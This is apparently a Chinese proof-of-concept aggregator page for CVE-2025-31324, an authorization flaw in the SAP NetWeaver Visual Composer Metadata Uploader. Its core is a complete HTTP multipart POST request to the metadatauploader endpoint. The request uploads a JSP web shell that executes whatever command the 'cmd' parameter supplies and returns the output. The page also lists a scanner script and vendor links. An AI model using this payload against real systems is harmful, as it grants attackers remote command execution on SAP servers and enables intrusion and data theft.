POC详情: 6d5f2992446959366de669f22a4abefc132b90c5

来源
关联漏洞
标题: SAP NetWeaver Visual Composer Metadata Uploader 代码问题漏洞 (CVE-2025-31324)
描述:SAP NetWeaver Visual Composer Metadata Uploader是德国思爱普(SAP)公司的一个用于辅助建模的工具。 SAP NetWeaver Visual Composer Metadata Uploader存在代码问题漏洞,该漏洞源于授权不当,可能导致上传恶意可执行文件。
描述
CVE-2025-31324, SAP Exploit
介绍
# CVE-2025-31324
CVE-2025-31324, SAP Exploit
```
POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive
Content-Length: 636
Content-Type: multipart/form-data; boundary=11111111111111111111111111

--11111111111111111111111111
Content-Disposition: form-data; name="file"; filename="cmd.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>

--11111111111111111111111111--

```
[CVE-2025-31324](https://redrays.io/blog/critical-sap-netweaver-vulnerability-cve-2025-31324-fixed-actively-exploited-in-the-wild/)
[SAP Penetration Testing](https://redrays.io/sap-penetration-testing/)
[SAP ABAP Code Scanner](https://redrays.io/abap-scanner/)
文件快照

[4.0K] /data/pocs/6d5f2992446959366de669f22a4abefc132b90c5 ├── [1.2K] README.md └── [7.5K] Scanner_CVE-2025-31324.py 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。